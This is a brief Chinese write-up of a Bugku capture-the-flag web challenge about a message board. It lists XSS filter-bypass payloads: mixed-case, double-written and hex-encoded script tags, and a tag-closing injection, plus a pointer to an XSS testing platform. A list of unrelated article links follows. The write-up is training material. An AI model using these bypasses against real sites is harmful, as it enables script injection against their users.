bugku-web-留言板1

大小写绕过也不行

<ScRipt>ALeRt("XSS");</sCRipT>

双写绕过可以

<scscriptript>alert('z')</scscriptript>

改变大小写

在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则:

比如:<script>alert("xss");</script>可以转换为:

<ScRipt>ALeRt("XSS");</sCRipT>

关闭标签

有时候我们需要关闭标签来使我们的XSS生效。

比如:"><script>alert("Hi");</script>

使用hex编码绕过

我们可以对我们的语句进行hex编码来绕过XSS规则

比如:<script>alert("xss");</script>可以转换为:

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b%3c%2f%73%63%72%69%70%74%3e

所以确定了过滤方式之后,找个xss平台(https://xssaq.com)测试一下:

相关推荐
To_OC1 天前
别再串行写 await 了,Promise.all 才是并行请求的正确打开方式
前端·javascript·promise
To_OC1 天前
LC 17 电话号码的字母组合:我的回溯算法,就是从这道题开窍的
javascript·算法·leetcode
vipbic1 天前
中后台越做越乱后,我用插件化把它救回来了
前端·vue.js
Hyyy1 天前
Computer Use 适合做什么,不适合做什么——一次真实使用后的思考
前端
小和尚同志1 天前
前端 AI 单元测试思考与落地
前端·人工智能·aigc
invicinble1 天前
c端系统,其实更像一个信息展示平台
前端
你怎么知道我是队长1 天前
JavaScript的变量和数据类型介绍
开发语言·javascript·ecmascript
李姆斯1 天前
管理是否可以被完全量化
前端·产品经理·团队管理
名字还没想好☜1 天前
Next.js 中间件实战:鉴权、重定向与 A/B 分流
开发语言·前端·javascript·中间件·react·next.js
广州灵眸科技有限公司1 天前
瑞芯微RV1126B开发板(EASY-EAI-PI2) INI文件操作
java·前端·javascript·网络·人工智能